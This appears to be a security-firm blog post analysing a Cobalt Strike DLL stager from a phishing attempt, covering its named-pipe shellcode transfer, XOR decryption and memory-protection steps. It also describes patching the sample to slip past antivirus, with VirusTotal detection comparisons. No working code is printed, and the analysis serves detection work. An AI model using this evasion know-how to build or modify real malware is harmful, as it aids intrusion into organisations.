At NVISO, we are always looking at ways to improve our detection mechanisms. Understanding how Metasploit works is one part of the bigger picture and as a result of this research, we were able to build Yara rules identifying Metasploit payloads by fingerprinting both import hashes and average distances between them. A subset of these rules is available upon request.

Anatomy of Cobalt Strike’s DLL Stager

26 April 2021 at 16:51

NVISO recently monitored a targeted campaign against one of its customers in the financial sector. The attempt was spotted at its earliest stage following an employee’s report concerning a suspicious email. While no harm was done, we commonly identify any related indicators to ensure additional monitoring of the actor.

The reported email was an application for one of the company’s public job offers and attempted to deliver a malicious document. What caught our attention, besides leveraging an actual job offer, was the presence of execution-guardrails in the malicious document. Analysis of the document uncovered the intention to persist a Cobalt Strike stager through Component Object Model Hijacking.

During my free time I enjoy analyzing samples NVISO spots in-the-wild, and hence further dissected the Cobalt Strike DLL payload. This blog post will cover the payload’s anatomy, design choices and highlight ways to reduce both log footprint and time-to-shellcode.

Execution Flow Analysis

To understand how the malicious code works we have to analyze its behavior from start to end. In this section, we will cover the following flows:

  1. The initial execution through DllMain.
  2. The sending of encrypted shellcode into a named pipe by WriteBufferToPipe.
  3. The pipe reading, shellcode decryption and execution through PipeDecryptExec.

As previously mentioned, the malicious document’s DLL payload was intended to be used as a COM in-process server. With this knowledge, we can already expect some known entry points to be exposed by the DLL.

List of available entry points as displayed in IDA.

While technically the malicious execution can occur in any of the 8 functions, malicious code commonly resides in the DllMain function given, besides TLS callbacks, it is the function most likely to execute.

DllMain: An optional entry point into a dynamic-link library (DLL). When the system starts or terminates a process or thread, it calls the entry-point function for each loaded DLL using the first thread of the process. The system also calls the entry-point function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary functions.

docs.microsoft.com/en-us/windows/win32/dlls/dllmain

Throughout the following analysis functions and variables have been renamed to reflect their usage and improve clarity.

The DllMain Entry Point

As can be seen in the following capture, the DllMain function simply executes another function by creating a new thread. This threaded function we named DllMainThread is executed without any additional arguments being provided to it.

Graphed disassembly of DllMain.

Analyzing the DllMainThread function uncovers it is an additional wrapper towards what we will discover is the malicious payload’s decryption and execution function (called DecryptBufferAndExec in the capture).

Disassembly of DllMainThread.

By going one level deeper, we can see the start of the malicious logic. Analysts experienced with Cobalt Strike will recognize the well-known MSSE-%d-server pattern.

Disassembly of DecryptBufferAndExec.

A couple of things occur in the above code:

  1. The sample starts by retrieving the tick count through GetTickCount and then divides it by 0x26AA. While obtaining a tick count is often a time measurement, the next operation solely uses the divided tick as a random number.
  2. The sample then proceeds to call a wrapper around an implementation of the sprintf function. Its role is to format a string into the PipeName buffer. As can be observed, the formatted string will be \\.\pipe\MSSE-%d-server where %d will be the result computed in the previous division (e.g.: \\.\pipe\MSSE-1234-server). This pipe’s format is a well-documented Cobalt Strike indicator of compromise.
  3. With the pipe’s name defined in a global variable, the malicious code creates a new thread to run WriteBufferToPipeThread. This function will be the next one we will analyze.
  4. Finally, while the new thread is running, the code jumps to the PipeDecryptExec routine.

So far, we had a linear execution from our DllMain entry point until the DecryptBufferAndExec function. We could graph the flow as follows:

Execution flow from DllMain until DecryptBufferAndExec.

As we can see, two threads are now going to run concurrently. Let’s focus ourselves on the one writing into the pipe (WriteBufferToPipeThread) followed by its reading counterpart (PipeDecryptExec) afterwards.

The WriteBufferToPipe Thread

The thread writing into the generated pipe is launched from DecryptBufferAndExec without any additional arguments. By entering into the WriteBufferToPipeThread function, we can observe it is a simple wrapper to WriteBufferToPipe except it furthermore passes the following arguments recovered from a global Payload variable (pointed to by the pPayload pointer):

  1. The size of the shellcode, stored at offset 0x4.
  2. A pointer to a buffer containing the encrypted shellcode, stored at offset 0x14.
Disassembly of WriteBufferToPipeThread.

Within the WriteBufferToPipe function we can notice the code starts by creating a new pipe. The pipe’s name is recovered from the PipeName global variable which, if you remember, was previously populated by the sprintf function. The code creates a single instance, outbound pipe (PIPE_ACCESS_OUTBOUND) by calling CreateNamedPipeA and then connects to it using the ConnectNamedPipe call.

Graphed disassembly of WriteBufferToPipe‘s named pipe creation.

If the connection was successful, the WriteBufferToPipe function proceeds to loop the WriteFile call as long as there are bytes of the shellcode to be written into the pipe.

Graphed disassembly of WriteBufferToPipe writing to the pipe.

One important detail worth noting is that once the shellcode is written into the pipe, the previously opened handle to the pipe is closed through CloseHandle. This indicates that the pipe’s sole purpose was to transfer the encrypted shellcode.

Once the WriteBufferToPipe function is completed, the thread terminates. Overall the execution flow was quite simple and can be graphed as follows:

Execution flow from WriteBufferToPipe.

The PipeDecryptExec Flow

As a quick refresher, the PipeDecryptExec flow was executed immediately after the creation of the WriteBufferToPipe thread. The first task performed by PipeDecryptExec is to allocate a memory region to receive shellcode to be transmitted through the named pipe. To do so, a call to malloc is performed with as argument the shellcode size stored at offset 0x4 of the global Payload variable.

Once the buffer allocation is completed, the code sleeps for 1024 milliseconds (0x400) and calls FillBufferFromPipe with both buffer location and buffer size as argument. Should the FillBufferFromPipe call fail by returning FALSE (0), the code loops again to the Sleep call and attempts the operation again until it succeeds. These Sleep calls and loops are required as the multi-threaded sample has to wait for the shellcode being written into the pipe.

Once the shellcode is written to the allocated buffer, PipeDecryptExec will finally launch the decryption and execution through XorDecodeAndCreateThread.

Graphed disassembly of PipeDecryptExec.

To transfer the encrypted shellcode from the pipe into the allocated buffer, FillBufferFromPipe opens the pipe in read-only mode (GENERIC_READ) using CreateFileA. As was done for the pipe’s creation, the name is retrieved from the global PipeName variable. If accessing the pipe fails, the function proceeds to return FALSE (0), resulting in the above described Sleep and retry loop.

Disassembly of FillBufferFromPipe‘s pipe access.

Once the pipe opened in read-only mode, the FillBufferFromPipe function proceeds to copy over the shellcode until the allocated buffer is filled using ReadFile. Once the buffer filled, the handle to the named pipe is closed through CloseHandle and FillBufferFromPipe returns TRUE (1).

Graphed disassembly of FillBufferFromPipe copying data.

Once FillBufferFromPipe has successfully completed, the named pipe has completed its task and the encrypted shellcode has been moved from one memory region to another.

Back in the caller PipeDecryptExec function, once the FillBufferFromPipe call returns TRUE the XorDecodeAndCreateThread function gets called with the following parameters:

  1. The buffer containing the copied shellcode.
  2. The length of the shellcode, stored at the global Payload variable’s offset 0x4.
  3. The symmetric XOR decryption key, stored at the global Payload variable’s offset 0x8.

Once invoked, the XorDecodeAndCreateThread function starts by allocating yet another memory region using VirtualAlloc. The allocated region has read/write permissions (PAGE_READWRITE) but is not executable. By not making a region writable and executable at the same time, the sample possibly attempts to evade security solutions which only look for PAGE_EXECUTE_READWRITE regions.

Once the region is allocated, the function loops over the shellcode buffer and decrypts each byte using a simple xor operation into the newly allocated region.

Graphed disassembly of XorDecodeAndCreateThread.

When the decryption is complete, the GetModuleHandleAndGetProcAddressToArg function is called. Its role is to place pointers to two valuable functions into memory: GetModuleHandleA and GetProcAddress. These functions should enable the shellcode to further resolve additional procedures without relying on them being imported. Before storing these pointers, the GetModuleHandleAndGetProcAddressToArg function first ensures a specific value is not FALSE (0). Surprisingly enough, this value stored in a global variable (here called zero) is always FALSE, resulting in the pointers never being stored.

Graphed disassembly of GetModuleHandleAndGetProcAddressToArg.

Back in the caller function, XorDecodeAndCreateThread changes the shellcode’s memory region to be executable (PAGE_EXECUTE_READ) using VirtualProtect and finally creates a new thread. This final thread starts at the JumpToParameter function which acts as a simple wrapper to the shellcode, provided as argument.

Disassembly of JumpToParameter.

From here, the previously encrypted Cobalt Strike shellcode stager executes to resolve WinINet procedures, download the final beacon and execute it. We will not cover the shellcode’s analysis in this post as it would deserve a post of its own.

While this last flow contained more branches and logic, the overall graph remains quite simple:

Execution flow from PipeDecryptExec until the shellcode.

Memory Flow Analysis

What was the most surprising throughout the above analysis was the presence of a well-known named pipe. Pipes can be used as a defense evasion mechanism by decrypting the shellcode at pipe exit or for inter-process communications; but in our case it merely acted as a memcpy to move encrypted shellcode from the DLL into another buffer.

Memory flow from encrypted shellcode until decryption.

So why would this overhead be implemented? As pointed out by another colleague, the answer lays in the Artifact Kit, a Cobalt Strike dependency:

Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. […] One of the techniques [see: src-common/bypass-pipe.c in the Artifact Kit] generates executables and DLLs that serve shellcode to themselves over a named pipe. If an anti-virus sandbox does not emulate named pipes, it will not find the known bad shellcode.

cobaltstrike.com/help-artifact-kit

As we can see in the above diagram, the staging of the encrypted shellcode in the malloc buffer generates a lot of overhead supposedly for evasion. These operations could be avoided should XorDecodeAndCreateThread instead directly read from the initial encrypted shellcode as outlined in the next diagram. Avoiding the usage of named pipes will furthermore remove the need for looped Sleep calls as the data would be readily available.

Improved memory flow from encrypted shellcode until decryption.

It seems we found a way to reduce the time-to-shellcode; but do popular anti-virus solutions actually get tricked by the named pipe?

Patching the Execution Flow

To test that theory, let’s improve the malicious execution flow. For starters we could skip the useless pipe-related calls and have the DllMainThread function call PipeDecryptExec directly, bypassing pipe creation and writing. How the assembly-level patching is performed is beyond this blog post’s scope as we are just interested in the flow’s abstraction.

Disassembly of the patched DllMainThread.

The PipeDecryptExec function will also require patching to skip malloc allocation, pipe reading and ensure it provides XorDecodeAndCreateThread with the DLL’s encrypted shellcode instead of the now-nonexistent duplicated region.

Disassembly of the patched PipeDecryptExec.

With our execution flow patched, we can furthermore zero-out any unused instructions should these be used by security solutions as a detection base.

When the patches are applied, we end up with a linear and shorter path until shellcode execution. The following graph focuses on this patched path and does not include the leaves beneath WriteBufferToPipeThread.

Outline of the patched (red) execution flow and functions.

As we also figured out how the shellcode is encrypted (we have the xor key), we modified both samples to redact the actual C2 as it can be used to identify our targeted customer.

To ensure the shellcode did not rely on any bypassed calls, we spun up a quick Python HTTPS server and made sure the redacted domain resolved to 127.0.0.1. We then can invoke both the original and patched DLL through rundll32.exe and observe how the shellcode still attempts to retrieve the Cobalt Strike beacon, proving our patches did not affect the shellcode. The exported StartW function we invoke is a simple wrapper around the Sleep call.

Capture of both the original and patched DLL attempting to fetch the Cobalt Strike beacon.

Anti-Virus Review

So do named pipes actually work as a defense evasion mechanism? While there are efficient ways to measure our patches’ impact (e.g.: comparing across multiple sandbox solutions), VirusTotal does offer a quick primary assessment. As such, we submitted the following versions with redacted C2 to VirusTotal:

  • wpdshext.dll.custom.vir which is the redacted Cobalt Strike DLL.
  • wpdshext.dll.custom.patched.vir which is our patched and redacted Cobalt Strike DLL without named pipes.

As the original Cobalt Strike contains identifiable patterns (the named pipe), we would expect the patched version to have a lower detection ratio, although the Artifact Kit would disagree.

Capture of the original Cobalt Strike’s detection ratio on VirusTotal.
Capture of the patched Cobalt Strike’s detection ratio on VirusTotal.

As we expected, the named-pipe overhead leveraged by Cobalt Strike actually turned out to act as a detection base. As can be seen in the above captures, while the original version (left) obtained only 17 detections, the patched version (right) obtained one less for a total of 16 detections. Among the thrown-off solutions we noticed ESET and Sophos did not manage to detect the pipe-less version, whereas ZoneAlarm couldn’t identify the original version.

One notable observation is that an intermediary patch where the flow is adapted but unused code is not zeroed-out turned out to be the most detected version with a total of 20 hits. This higher detection rate occurs as this patch allows pipe-unaware anti-virus vendors to also locate the shellcode while pipe-related operation signatures are still applicable.

Capture of the intermediary patched Cobalt Strike’s detection ratio on VirusTotal.

While these tests focused on the default Cobalt Strike behavior against the absence of named pipes, one might argue that a customized named pipe pattern would have had the best results. Although we did not think of this variant during the initial tests, we submitted a version with altered pipe names (NVISO-RULES-%d instead of MSSE-%d-server) the day after and obtained 18 detections. As a comparison, our two other samples had their detection rate increase to 30+ over night. We however have to consider the possibility that these 18 detections are influenced by the initial shellcode being burned.

Conclusion

Reversing the malicious Cobalt Strike DLL turned out to be more interesting than expected. Overall, we noticed the presence of noisy operations whose usage weren’t a functional requirement and even turn out to act as a detection base. To confirm our hypothesis, we patched the execution flow and observed how our simplified version still reaches out to the C2 server with a lowered (almost unaltered) detection rate.

So why does it matter?

The Blue

First and foremost, this payload analysis highlights a common Cobalt Strike DLL pattern allowing us to further fine-tune detection rules. While this stager was the first DLL analyzed, we did take a look at other Cobalt Strike formats such as default beacons and those leveraging a malleable C2, both as Dynamic Link Libraries and Portable Executables. Surprisingly enough, all formats shared this commonly documented MSSE-%d-server pipe name and a quick search for open-source detection rules showed how little it is being hunted for.

The Red

Besides being helpful for NVISO’s defensive operations, this research further comforts our offensive team in their choice of leveraging custom-built delivery mechanisms; even more so following the design choices we documented. The usage of named pipes in operations targeting mature environments is more likely to raise red flags and so far does not seem to provide any evasive advantage without alteration in the generation pattern at least.


To the next actor targeting our customers: I am looking forward to modifying your samples and test the effectiveness of altered pipe names.

Maxime Thiebaut
Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified intrusion analyst in NVISO’s Managed Detection & Response team. He spends most of his time investigating incidents and improving detection capabilities. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.

❌